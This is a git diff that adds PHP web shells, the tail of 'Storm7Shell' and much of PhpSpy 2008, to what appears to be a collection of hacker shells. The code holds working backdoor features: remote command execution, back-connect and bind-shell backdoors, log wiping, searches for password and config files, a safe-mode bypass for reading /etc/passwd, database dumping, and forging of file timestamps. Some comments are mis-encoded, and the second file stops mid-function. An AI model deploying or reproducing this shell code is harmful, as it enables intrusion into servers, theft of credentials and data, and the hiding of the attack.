+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". 
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". 
+"IQA7" 
+ ); 
+ //For simple size- and speed-optimization. 
+ $imgequals = array( 
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), 
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), 
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), 
+  "ext_html"=>array("ext_html","ext_htm"), 
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), 
+  "ext_lnk"=>array("ext_lnk","ext_url"), 
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"), 
+  "ext_doc"=>array("ext_doc","ext_dot"), 
+  "ext_js"=>array("ext_js","ext_vbs"), 
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), 
+  "ext_wri"=>array("ext_wri","ext_rtf"), 
+  "ext_swf"=>array("ext_swf","ext_fla"), 
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), 
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") 
+ ); 
+ if (!$getall) 
+ { 
+  header("Content-type: image/gif"); 
+  header("Cache-control: public"); 
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); 
+  header("Cache-control: max-age=".(60*60*24*7)); 
+  header("Last-Modified: ".date("r",filemtime(__FILE__))); 
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} 
+  if (empty($images[$img])) {$img = "small_unk";} 
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";} 
+  echo base64_decode($images[$img]); 
+ } 
+ else 
+ { 
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} 
+  natsort($images); 
+  $k = array_keys($images); 
+  echo  "<center>"; 
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} 
+  echo "</center>"; 
+ } 
+ exit; 
+} 
+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";} 
+if ($act == "backc")
+{
+ $ip = $_SERVER["REMOTE_ADDR"];
+ $msg = $_POST['backcconnmsg'];
+ $emsg = $_POST['backcconnmsge'];
+ echo('<center><b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value='.$ip.'> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>First, run NetCat on your computer using \'<b>nc -l -n -v -p '.$bc_port.'</b>\'.  Then, click "Connect" once the port is listening.</center>');
+ echo $msg;
+ echo $emsg;
+}
+
+if ($act == 'shbd'){
+$msg = $_POST['backcconnmsg'];
+$emsg = $_POST['backcconnmsge'];
+echo("<center><b>Bind Shell Backdoor:</b></br></br><form name=form method=POST>
+Bind Port: <input type='text' name='backconnectport' value='5992'>
+<input type='hidden' name='use' value='shbd'>
+<input type='submit' value='Install Backdoor'></form>");
+echo("$msg");
+echo("$emsg");
+echo("</center>");
+} ?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td width="100%" height="1" valign="top" colspan="2"></td></tr> 
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td>
+<td width="50%" height="1" valign="top">
+   <center>Kernel Info: <form method="get" action="http://google.com/search"> 
+      <input name="q" type="text" size="80" value="<?php echo wordwrap(php_uname()); ?>"> 
+      <input type=submit value="Google!"> 
+    </form></center> 
+</td></tr>
+</TABLE> 
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top"></td></tr> 
+<tr><td width="100%" height="83" valign="top">
+
+<center>
+<table border=0>
+<tr><td>
+<center>Functions</center>
+</td><td>
+<center>Make Dir</center>
+</td><td>
+<center>Go Dir</center>
+</td></tr>
+<tr><td>
+<center>
+<form action="<?php echo $surl; ?>"> 
+<input type=hidden name="d" value="<?php echo $dispd; ?>"> 
+<SELECT NAME="act">
+<OPTION VALUE="zap2">Wipe Logs Using zap2 (*nix)
+<OPTION VALUE="miglc">Wipe Logs Using Mig-LogCleaner (*nix)
+<OPTION VALUE="clearlogs">Wipe Logs Using ClearLogs (Windows)
+</SELECT><br>
+<input type=submit name="submit" value="Execute"><br>
+&nbsp;
+</form>
+</center>
+</td><td>
+<form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+<center>
+<input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">
+<br>
+<input type=submit value="Create"><br><?php echo $wdt; ?></form>
+</center>
+</td><td>
+<form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls">
+<center>
+<input type="text" name="d" size="50" value="<?php echo $dispd; ?>">
+<br>
+<input type=submit value="Go"><br>
+&nbsp;
+</form>
+</center>
+</td></tr>
+<tr><td>
+<center>Aliases</center>
+</td><td>
+<center>Make File</center>
+</td><td>
+<center>Go File</center>
+</td></tr>
+<tr><td>
+<?php
+// Command-aliases 
+if (!$win) // if the box isn't windows; most likely *nix
+{ 
+ $cmdaliases = array( 
+  array('-----------------------------------------------------------', 'ls -la'),
+  array('Currently Logged in Users', 'w'),
+  array('Last User to Connect', 'lastlog'),
+  array('Find Users Without a Password', 'cut -d: -f1,2,3 /etc/passwd | grep ::'),
+  array('Is /etc Writable?', 'find /etc/ -type f -perm -o+w 2> /dev/null'),
+  array('Installed Downloaders', 'which wget curl w3m lynx'),
+  array('Open Ports', 'netstat -an | grep -i listen'),
+  array('Box Uptime', 'uptime'),
+  array('System Variables', 'set'),
+  array('ARP table', 'arp -a'),
+  array('Patch Level for RedHat 7.0', 'rpm -qa'),
+  array('Network Interfaces', 'ifconfig'),
+  array('Mounted Filesystems', 'mount'),
+  array('Find Suid Bins', 'find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null'),
+  array("Find All Suid Files", "find / -type f -perm -04000 -ls"), 
+  array("Find Suid Files in Current Dir", "find . -type f -perm -04000 -ls"), 
+  array("Find All Sgid Files", "find / -type f -perm -02000 -ls"), 
+  array("Find Sgid Files in Current Dir", "find . -type f -perm -02000 -ls"), 
+  array("Find config.inc.php Files", "find / -type f -name config.inc.php"), 
+  array("Find config* Files", "find / -type f -name \"config*\""), 
+  array("Find config* Files in Current Dir", "find . -type f -name \"config*\""), 
+  array("Find All Writable Folders and Files", "find / -perm -2 -ls"), 
+  array("Find All Writable Folders and Files in Current Dir", "find . -perm -2 -ls"), 
+  array("Find All service.pwd Files", "find / -type f -name service.pwd"), 
+  array("Find service.pwd Files in Current Dir", "find . -type f -name service.pwd"), 
+  array("Find All .htpasswd Files", "find / -type f -name .htpasswd"), 
+  array("Find .htpasswd Files in Current Dir", "find . -type f -name .htpasswd"), 
+  array("Find All .bash_history Files", "find / -type f -name .bash_history"), 
+  array("Find .bash_history Files in Current Dir", "find . -type f -name .bash_history"), 
+  array("Find All .fetchmailrc Files", "find / -type f -name .fetchmailrc"), 
+  array("Find .fetchmailrc Files in Current Dir", "find . -type f -name .fetchmailrc"), 
+  array("List File Attributes on a Linux Second Extended File System", "lsattr -va"), 
+ ); 
+} 
+else // if the box is windows
+{ 
+ $cmdaliases = array( 
+  array('-----------------------------------------------------------', 'dir'),
+  array('Active Connections', 'netstat -an'),
+  array('ARP Table', 'arp -a'),
+  array('Net Shares', 'net use'),
+  array('IP Configuration', 'ipconfig /all'),
+  array('Disk Quotas', 'fsutil quota query '.$pd[0]),
+  array('Drive Type', 'fsutil fsinfo drivetype '.$pd[0])
+ ); 
+}
+?>
+<center><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">
+<br>
+<input type=submit name=submit value="Execute"><br>
+&nbsp;
+</form>
+</center>
+</td><td>
+<center>
+<form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+<input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">
+<br>
+<input type=submit value="Create"><br><?php echo $wdt; ?></form>
+</center>
+</td><td>
+<form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+<center>
+<input type="text" name="f" size="50" value="<?php echo $dispd; ?>">
+<br>
+<input type=submit value="Go"></form>
+<br>&nbsp;
+</center>
+</td></tr>
+</table>
+</center>
+    </td></tr>
+</TABLE><br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"></td></tr> 
+<tr><td width=50% height=83 valign=top>
+<center>PHP Safe-Mode Bypass (Read File)<br><br>
+<form action="<?php echo $surl; ?>" method=GET>
+File: <input type=text name="file"> <input type=submit value="Read File">
+<br><br>
+e.g.: /etc/passwd or C:/whatev.txt
+</form>
+</center>
+<?php
+if(isset($_GET['file'])) {
+	$test='';
+	$temp=tempnam($test, 'cx');
+	$file=$_GET['file'];    
+	$get=htmlspecialchars($file);
+	echo 'Trying To Get File <font color=#000099><b>'.$get.'</b></font><br>';
+	if(copy("compress.zlib://".$file, $temp)){
+		$fichier = fopen($temp, 'r');
+		$action = fread($fichier, filesize($temp));
+		fclose($fichier);
+		$source=htmlspecialchars($action);
+		echo '<b>Start '.$get.'</b><br><br><font color=white>'.$source.'</font><br><b><br>Fin <font color=#000099>'.$get.'</font></b>';
+		unlink($temp);
+	} else
+		echo '<font color=red><center>Sorry... File <b>'.htmlspecialchars($file).'</b> dosen\'t exists or you don\'t have access.</center></font>';
+}
+?>
+</td><td width=50% height=83 valign=top> 
+<center>PHP Safe-Mode Bypass (Directory Listing)<br><br>
+<form action="<?php echo $surl; ?>" method=GET>
+Dir: <input type=text name="directory"> <input type=submit value="List Directory">
+<br><br>
+e.g.: /etc/ or C:/
+</form>
+</center>
+<?php
+if(isset($_GET['directory'])) {
+	$chemin = $_GET['directory'];
+	$files = glob("$chemin*");
+	echo 'Trying To List Folder <font color=#000099><b>'.$chemin.'</b></font><br><br>';
+	foreach ($files as $filename)
+		echo $filename."\n<br>"; // added the \n for easier readability while viewing the html source
+}
+?>
+</td> 
+</tr></TABLE>
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"></td></tr> 
+<tr> 
+ <td width="50%" height="1" valign="top"><center>Search<form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> 
+ <td width="50%" height="1" valign="top"><center>Upload<form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> 
+</tr> 
+</table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><center><b>--[ Storm7Shell v<?php echo $shver; ?>, coded by sToRm</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b><br>Who said that it's better to have loved and lost?<br>I wish that I had never loved at all.</center></td></tr></table>
+</body></html><?php chdir($lastdir); c99shexit(); ?>
diff --git a/xakep-shells/PHP/2008.php.php.txt b/xakep-shells/PHP/2008.php.php.txt
new file mode 100644
index 0000000..9e68fe1
--- /dev/null
+++ b/xakep-shells/PHP/2008.php.php.txt
@@ -0,0 +1,1990 @@
+<?php
+
+/*****************************************************************************
+
+===================== �������ڷǷ���;�����һ�к���뱾���޹ء�====================
+
+�����˰汾��Ϊ�˼��ȫ��ʹ�����ĻԻ͡�
+
+��л��������һͬ�߹���Sniper\Super��Hei\kEvin1986\saiy\wofeiwo��
+
+��л���е������ǡ��ֵ��ǡ���л���ǵĹ��ĺ�֧�֣�
+
+ѡ����1��7�շ�����Ϊ�˼��������ŵ����գ�Ԥף���ڱ���������㷭����
+
+====================== ���Ԥף��ȫ��ʹ��ÿһλ���ѷɻ��ڴ� =======================
+
+Codz by angel(4ngel)
+
+Make in China
+
+Web: http://www.4ngel.net
+
+*****************************************************************************/
+
+error_reporting(7);
+@set_magic_quotes_runtime(0);
+ob_start();
+$mtime = explode(' ', microtime());
+$starttime = $mtime[1] + $mtime[0];
+define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
+//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
+define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
+define('IS_COM', class_exists('COM') ? 1 : 0 );
+define('IS_GPC', get_magic_quotes_gpc());
+$dis_func = get_cfg_var('disable_functions');
+define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
+@set_time_limit(0);
+
+foreach(array('_GET','_POST') as $_request) {
+	foreach($$_request as $_key => $_value) {
+		if ($_key{0} != '_') {
+			if (IS_GPC) {
+				$_value = s_array($_value);
+			}
+			$$_key = $_value;
+		}
+	}
+}
+
+/*===================== �������� =====================*/
+$admin = array();
+// �Ƿ���Ҫ������֤, true Ϊ��Ҫ��֤, false Ϊֱ�ӽ���.����ѡ������Ч
+$admin['check'] = true;
+// �����Ҫ������֤,���޸ĵ�½����
+$admin['pass']  = 'angel';
+
+//������ cookie ���÷�Χ������Ҫ��, ���¼������, ���޸��������, �����뱣��Ĭ��
+// cookie ǰ׺
+$admin['cookiepre'] = '';
+// cookie ������
+$admin['cookiedomain'] = '';
+// cookie ����·��
+$admin['cookiepath'] = '/';
+// cookie ��Ч��
+$admin['cookielife'] = 86400;
+/*===================== ���ý��� =====================*/
+
+if ($charset == 'utf8') {
+	header("content-Type: text/html; charset=utf-8");
+} elseif ($charset == 'big5') {
+	header("content-Type: text/html; charset=big5");
+} elseif ($charset == 'gbk') {
+	header("content-Type: text/html; charset=gbk");
+} elseif ($charset == 'latin1') {
+	header("content-Type: text/html; charset=iso-8859-2");
+}
+
+$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
+$timestamp = time();
+
+/*===================== ������֤ =====================*/
+if ($action == "logout") {
+	scookie('phpspypass', '', -86400 * 365);
+	p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
+	p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
+	exit;
+}
+if($admin['check']) {
+	if ($doing == 'login') {
+		if ($admin['pass'] == $password) {
+			scookie('phpspypass', $password);
+			p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
+			p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
+			exit;
+		}
+	}
+	if ($_COOKIE['phpspypass']) {
+		if ($_COOKIE['phpspypass'] != $admin['pass']) {
+			loginpage();
+		}
+	} else {
+		loginpage();
+	}
+}
+/*===================== ��֤���� =====================*/
+
+$errmsg = '';
+
+// �鿴PHPINFO
+if ($action == 'phpinfo') {
+	if (IS_PHPINFO) {
+		phpinfo();
+	} else {
+		$errmsg = 'phpinfo() function has non-permissible';
+	}
+}
+
+// �����ļ�
+if ($doing == 'downfile' && $thefile) {
+	if (!@file_exists($thefile)) {
+		$errmsg = 'The file you want Downloadable was nonexistent';
+	} else {
+		$fileinfo = pathinfo($thefile);
+		header('Content-type: application/x-'.$fileinfo['extension']);
+		header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+		header('Content-Length: '.filesize($thefile));
+		@readfile($thefile);
+		exit;
+	}
+}
+
+// ֱ�����ر������ݿ�
+if ($doing == 'backupmysql' && !$saveasfile) {
+	dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+	$table = array_flip($table);
+	$result = q("SHOW tables");
+	if (!$result) p('<h2>'.mysql_error().'</h2>');
+	$filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
+	header('Content-type: application/unknown');
+	header('Content-Disposition: attachment; filename='.$filename);
+	$mysqldata = '';
+	while ($currow = mysql_fetch_array($result)) {
+		if (isset($table[$currow[0]])) {
+			$mysqldata .= sqldumptable($currow[0]);
+		}
+	}
+	mysql_close();
+	exit;
+}
+
+// ͨ��MYSQL�����ļ�
+if($doing=='mysqldown'){
+	if (!$dbname) {
+		$errmsg = 'Please input dbname';
+	} else {
+		dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		if (!file_exists($mysqldlfile)) {
+			$errmsg = 'The file you want Downloadable was nonexistent';
+		} else {
+			$result = q("select load_file('$mysqldlfile');");
+			if(!$result){
+				q("DROP TABLE IF EXISTS tmp_angel;");
+				q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
+				//��ʱ�������ʾ�ض�,������ֶ�ȡ���������__angel_1111111111_eof__���ļ�ʱ�����������
+				q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
+				$result = q("select content from tmp_angel");
+				q("DROP TABLE tmp_angel");
+			}
+			$row = @mysql_fetch_array($result);
+			if (!$row) {
+				$errmsg = 'Load file failed '.mysql_error();
+			} else {
+				$fileinfo = pathinfo($mysqldlfile);
+				header('Content-type: application/x-'.$fileinfo['extension']);
+				header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+				header("Accept-Length: ".strlen($row[0]));
+				echo $row[0];
+				exit;
+			}
+		}
+	}
+}
+
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gbk">
+<title><?php echo str_replace('.','','P.h.p.S.p.y');?></title>
+<style type="text/css">
+body,td{font: 12px Arial,Tahoma;line-height: 16px;}
+.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
+.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
+.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
+a {color: #00f;text-decoration:underline;}
+a:hover{color: #f00;text-decoration:none;}
+.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
+.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
+.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
+.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
+.head td span{font-weight:normal;}
+form{margin:0;padding:0;}
+h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
+ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
+u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
+</style>
+<script type="text/javascript">
+function CheckAll(form) {
+	for(var i=0;i<form.elements.length;i++) {
+		var e = form.elements[i];
+		if (e.name != 'chkall')
+		e.checked = form.chkall.checked;
+    }
+}
+function $(id) {
+	return document.getElementById(id);
+}
+function goaction(act){
+	$('goaction').action.value=act;
+	$('goaction').submit();
+}
+</script>
+</head>
+<body style="margin:0;table-layout:fixed; word-break:break-all">
+<table width="100%" border="0" cellpadding="0" cellspacing="0">
+	<tr class="head">
+		<td><span style="float:right;"><a href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> Ver: 2008</a></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
+	</tr>
+	<tr class="alt1">
+		<td><span style="float:right;">Safe Mode:<?php echo getcfg('safe_mode');?></span>
+			<a href="javascript:goaction('logout');">Logout</a> | 
+			<a href="javascript:goaction('file');">File Manager</a> | 
+			<a href="javascript:goaction('sqladmin');">MySQL Manager</a> | 
+			<a href="javascript:goaction('sqlfile');">MySQL Upload &amp; Download</a> | 
+			<a href="javascript:goaction('shell');">Execute Command</a> | 
+			<a href="javascript:goaction('phpenv');">PHP Variable</a> | 
+			<a href="javascript:goaction('eval');">Eval PHP Code</a>
+			<?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
+		</td>
+	</tr>
+</table>
+<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
+<?php
+
+formhead(array('name'=>'goaction'));
+makehide('action');
+formfoot();
+
+$errmsg && m($errmsg);
+
+// ��ȡ��ǰ·��
+!$dir && $dir = '.';
+$nowpath = getPath(SA_ROOT, $dir);
+if (substr($dir, -1) != '/') {
+	$dir = $dir.'/';
+}
+$uedir = ue($dir);
+
+if (!$action || $action == 'file') {
+
+	// �ж϶�д���
+	$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
+
+	// ɾ��Ŀ¼
+	if ($doing == 'deldir' && $thefile) {
+		if (!file_exists($thefile)) {
+			m($thefile.' directory does not exist');
+		} else {
+			m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
+		}
+	}
+
+	// ����Ŀ¼
+	elseif ($newdirname) {
+		$mkdirs = $nowpath.$newdirname;
+		if (file_exists($mkdirs)) {
+			m('Directory has already existed');
+		} else {
+			m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
+			@chmod($mkdirs,0777);
+		}
+	}
+
+	// �ϴ��ļ�
+	elseif ($doupfile) {
+		m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
+	}
+
+	// �༭�ļ�
+	elseif ($editfilename && $filecontent) {
+		$fp = @fopen($editfilename,'w');
+		m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
+		@fclose($fp);
+	}
+
+	// �༭�ļ�����
+	elseif ($pfile && $newperm) {
+		if (!file_exists($pfile)) {
+			m('The original file does not exist');
+		} else {
+			$newperm = base_convert($newperm,8,10);
+			m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
+		}
+	}
+
+	// ����
+	elseif ($oldname && $newfilename) {
+		$nname = $nowpath.$newfilename;
+		if (file_exists($nname) || !file_exists($oldname)) {
+			m($nname.' has already existed or original file does not exist');
+		} else {
+			m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
+		}
+	}
+
+	// �����ļ�
+	elseif ($sname && $tofile) {
+		if (file_exists($tofile) || !file_exists($sname)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
+		}
+	}
+
+	// ��¡ʱ��
+	elseif ($curfile && $tarfile) {
+		if (!@file_exists($curfile) || !@file_exists($tarfile)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			$time = @filemtime($tarfile);
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// �Զ���ʱ��
+	elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
+		if (!@file_exists($curfile)) {
+			m(basename($curfile).' does not exist');
+		} else {
+			$time = strtotime("$year-$month-$day $hour:$minute:$second");
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// �������
+	elseif($doing == 'downrar') {
+		if ($dl) {
+			$dfiles='';
+			foreach ($dl as $filepath => $value) {
+				$dfiles.=$filepath.',';
+			}
+			$dfiles=substr($dfiles,0,strlen($dfiles)-1);
+			$dl=explode(',',$dfiles);
+			$zip=new PHPZip($dl);
+			$code=$zip->out;
+			header('Content-type: application/octet-stream');
+			header('Accept-Ranges: bytes');
+			header('Accept-Length: '.strlen($code));
+			header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
+			echo $code;
+			exit;
+		} else {
+			m('Please select file(s)');
+		}
+	}
+
+	// ����ɾ���ļ�
+	elseif($doing == 'delfiles') {
+		if ($dl) {
+			$dfiles='';
+			$succ = $fail = 0;
+			foreach ($dl as $filepath => $value) {
+				if (@unlink($filepath)) {
+					$succ++;
+				} else {
+					$fail++;
+				}
+			}
+			m('Deleted file have finished��choose '.count($dl).' success '.$succ.' fail '.$fail);
+		} else {
+			m('Please select file(s)');
+		}
+	}
+
+	//�������
+	formhead(array('name'=>'createdir'));
+	makehide('newdirname');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileperm'));
+	makehide('newperm');
+	makehide('pfile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'copyfile'));
+	makehide('sname');
+	makehide('tofile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'rename'));
+	makehide('oldname');
+	makehide('newfilename');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileopform'));
+	makehide('action');
+	makehide('opfile');
+	makehide('dir');
+	formfoot();
+
+	$free = @disk_free_space($nowpath);
+	!$free && $free = 0;
+	$all = @disk_total_space($nowpath);
+	!$all && $all = 0;
+	$used = $all-$free;
+	$used_percent = @round(100/($all/$free),2);
+	p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)</h2>');
+
+?>
+<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
+  <form action="" method="post" id="godir" name="godir">
+  <tr>
+    <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
+	<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
+    <td nowrap><input class="bt" value="GO" type="submit"></td>
+  </tr>
+  </form>
+</table>
+<script type="text/javascript">
+function createdir(){
+	var newdirname;
+	newdirname = prompt('Please input the directory name:', '');
+	if (!newdirname) return;
+	$('createdir').newdirname.value=newdirname;
+	$('createdir').submit();
+}
+function fileperm(pfile){
+	var newperm;
+	newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
+	if (!newperm) return;
+	$('fileperm').newperm.value=newperm;
+	$('fileperm').pfile.value=pfile;
+	$('fileperm').submit();
+}
+function copyfile(sname){
+	var tofile;
+	tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
+	if (!tofile) return;
+	$('copyfile').tofile.value=tofile;
+	$('copyfile').sname.value=sname;
+	$('copyfile').submit();
+}
+function rename(oldname){
+	var newfilename;
+	newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
+	if (!newfilename) return;
+	$('rename').newfilename.value=newfilename;
+	$('rename').oldname.value=oldname;
+	$('rename').submit();
+}
+function dofile(doing,thefile,m){
+	if (m && !confirm(m)) {
+		return;
+	}
+	$('filelist').doing.value=doing;
+	if (thefile){
+		$('filelist').thefile.value=thefile;
+	}
+	$('filelist').submit();
+}
+function createfile(nowpath){
+	var filename;
+	filename = prompt('Please input the file name:', '');
+	if (!filename) return;
+	opfile('editfile',nowpath + filename,nowpath);
+}
+function opfile(action,opfile,dir){
+	$('fileopform').action.value=action;
+	$('fileopform').opfile.value=opfile;
+	$('fileopform').dir.value=dir;
+	$('fileopform').submit();
+}
+function godir(dir,view_writable){
